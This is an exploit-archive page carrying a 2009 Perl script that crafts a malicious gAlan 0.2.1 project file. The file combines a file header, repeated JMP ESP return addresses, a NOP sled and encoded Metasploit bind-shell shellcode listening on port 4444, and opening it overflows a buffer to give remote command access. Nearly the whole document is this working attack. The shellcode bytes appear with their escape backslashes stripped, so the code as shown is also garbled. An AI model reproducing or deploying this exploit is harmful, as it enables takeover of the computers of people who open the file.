gAlan 0.2.1 Buffer Overflow 0day Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : gAlan 0.2.1 Buffer Overflow 0day Exploit
# Published : 2009-12-07
# Author : Jeremy Brown
# Previous Title : HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)
# Next Title : Adobe Illustrator CS4 v14.0.0 eps Universal Buffer Overflow (meta)

#!/usr/bin/perl
# kpasa.pl
# AKA
# gAlan Buffer Overflow 0day Exploit
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.07.2009
#
# *********************************************************************************************************
#
# "From Static Analysis to 0day Exploit"
#
# Originally a SecurityTubeCon Presentation, which I'm guessing was canceled without notice? At any rate,
# DoJoSec picked it up so thanks to those guys for that.
#
# Presentation: http://www.viddler.com/explore/dojosec/videos/3/
#
# not_you: "gotta restart (sp1 install vista)"
# me:      "i don't see how you use that operating system"
#
# kpasa.pl

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
$shellcode =
"x89xe0xddxc7xd9x70xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx43x5ax4ax4bx50x4dx4bx58" .
"x4ax59x4bx4fx4bx4fx4bx4fx45x30x4cx4bx42x4c" .
"x47x54x47x54x4cx4bx51x55x47x4cx4cx4bx43x4c" .
"x44x45x43x48x45x51x4ax4fx4cx4bx50x4fx45x48" .
"x4cx4bx51x4fx47x50x43x31x4ax4bx51x59x4cx4b" .
"x50x34x4cx4bx43x31x4ax4ex46x51x49x50x4dx49" .
"x4ex4cx4bx34x49x50x44x34x43x37x49x51x48x4a" .
"x44x4dx43x31x49x52x4ax4bx4cx34x47x4bx50x54" .
"x51x34x46x48x43x45x4dx35x4cx4bx51x4fx46x44" .
"x45x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4b" .
"x51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b" .
"x4cx49x42x4cx47x54x45x4cx43x51x48x43x46x51" .
"x49x4bx45x34x4cx4bx47x33x46x50x4cx4bx47x30" .
"x44x4cx4cx4bx42x50x45x4cx4ex4dx4cx4bx51x50" .
"x43x38x51x4ex43x58x4cx4ex50x4ex44x4ex4ax4c" .
"x46x30x4bx4fx49x46x45x36x51x43x45x36x42x48" .
"x47x43x50x32x42x48x44x37x42x53x47x42x51x4f" .
"x50x54x4bx4fx48x50x45x38x48x4bx4ax4dx4bx4c" .
"x47x4bx50x50x4bx4fx48x56x51x4fx4cx49x4bx55" .
"x43x56x4dx51x4ax4dx44x48x43x32x46x35x43x5a" .
"x43x32x4bx4fx4ex30x42x48x48x59x44x49x4cx35" .
"x4ex4dx46x37x4bx4fx49x46x46x33x51x43x46x33" .
"x51x43x46x33x47x33x51x43x47x33x46x33x4bx4f" .
"x48x50x42x46x43x58x42x31x51x4cx45x36x50x53" .
"x4cx49x4dx31x4dx45x42x48x49x34x44x5ax44x30" .
"x48x47x50x57x4bx4fx4ex36x42x4ax42x30x46x31" .
"x51x45x4bx4fx48x50x45x38x49x34x4ex4dx46x4e" .
"x4dx39x46x37x4bx4fx48x56x46x33x51x45x4bx4f" .
"x48x50x45x38x4bx55x51x59x4bx36x51x59x50x57" .
"x4bx4fx49x46x50x50x51x44x51x44x46x35x4bx4f" .
"x4ex30x4dx43x43x58x4dx37x42x59x49x56x42x59" .
"x50x57x4bx4fx48x56x46x35x4bx4fx4ex30x45x36" .
"x43x5ax43x54x45x36x43x58x42x43x42x4dx4dx59" .
"x4bx55x43x5ax50x50x46x39x47x59x48x4cx4dx59" .
"x4bx57x42x4ax51x54x4bx39x4ax42x50x31x49x50" .
"x4cx33x4ex4ax4bx4ex50x42x46x4dx4bx4ex50x42" .
"x46x4cx4cx53x4cx4dx42x5ax50x38x4ex4bx4ex4b" .
"x4ex4bx42x48x44x32x4bx4ex48x33x45x46x4bx4f" .
"x42x55x50x44x4bx4fx49x46x51x4bx46x37x46x32" .
"x50x51x46x31x46x31x43x5ax45x51x46x31x50x51" .
"x50x55x50x51x4bx4fx4ex30x42x48x4ex4dx49x49" .
"x44x45x48x4ex51x43x4bx4fx48x56x42x4ax4bx4f" .
"x4bx4fx46x57x4bx4fx48x50x4cx4bx50x57x4bx4c" .
"x4cx43x49x54x45x34x4bx4fx48x56x46x32x4bx4f" .
"x48x50x45x38x4ax50x4cx4ax44x44x51x4fx51x43" .
"x4bx4fx49x46x4bx4fx48x50x41x41";

$magic     = "Mjik";
$addr      = 0x7E429353; # JMP ESP @ user32,dll
$filename  = "bof.galan";

$retaddr = pack('l', $addr);

$payload = $magic . $retaddr x 258 . "x90" x 256 . $shellcode;

     open(FD, '>' . $filename);
     print FD $payload;
     close(FD);